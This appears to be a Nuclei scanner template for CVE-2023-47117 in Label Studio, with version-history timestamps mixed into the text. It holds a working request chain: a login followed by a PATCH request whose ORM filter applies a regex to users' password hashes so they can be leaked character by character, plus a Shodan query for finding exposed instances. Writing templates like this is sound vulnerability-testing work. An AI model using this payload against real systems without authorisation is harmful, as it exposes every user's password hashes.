2024-07-08 11:49:10 +00:00
id : CVE-2023-47117
info :
name : Label Studio - Sensitive Information Exposure
2024-07-08 12:21:39 +00:00
author : iamnoooob,rootxharsh,pdresearch
2024-07-08 11:49:10 +00:00
severity : high
description : |
2024-07-08 12:21:39 +00:00
An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
2024-07-08 11:49:10 +00:00
reference :
- https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
- https://nvd.nist.gov/vuln/detail/CVE-2023-47117
2024-07-08 12:21:39 +00:00
- https://github.com/elttam/publications
2024-07-08 11:49:10 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-47117
cwe-id : CWE-200
2024-07-08 12:21:39 +00:00
epss-score : 0.0009
epss-percentile : 0.38398
2024-07-08 11:49:10 +00:00
cpe : cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
metadata :
verified : true
2024-07-08 12:21:39 +00:00
max-request : 4
2024-07-08 11:49:10 +00:00
vendor : humansignal
product : label_studio
2024-07-08 12:21:39 +00:00
shodan-query : http.favicon.hash:-1649949475
2024-07-08 11:49:10 +00:00
tags : cve,cve2023,label_studio,oss,exposure,authenticated
variables :
Task_id : "{{task}}"
Project_id : "{{project}}"
http :
- raw :
- |
GET /user/login/ HTTP/1.1
Host : {{Hostname}}
- |
POST /user/login/?next=/projects/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on
- |
PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
{"id" : {{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}
- |
GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
- 'status_code_3==200 && status_code_4==200'
- 'contains(header_4, "application/json")'
condition : and
extractors :
- type : regex
part : body
name : csrf
group : 1
regex :
- 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
internal : true
2024-07-09 08:48:12 +00:00
# digest: 4a0a00473045022100efb2bff232c70a7681dabfdbe49a60c516fcd5f5e446af96976aa8295a59d6b20220612431a6a43f670e2023f79605bdb673f619d459e4d74126b8bfc430ff91f9af:922c64590222798bb761d5b6d8e72950
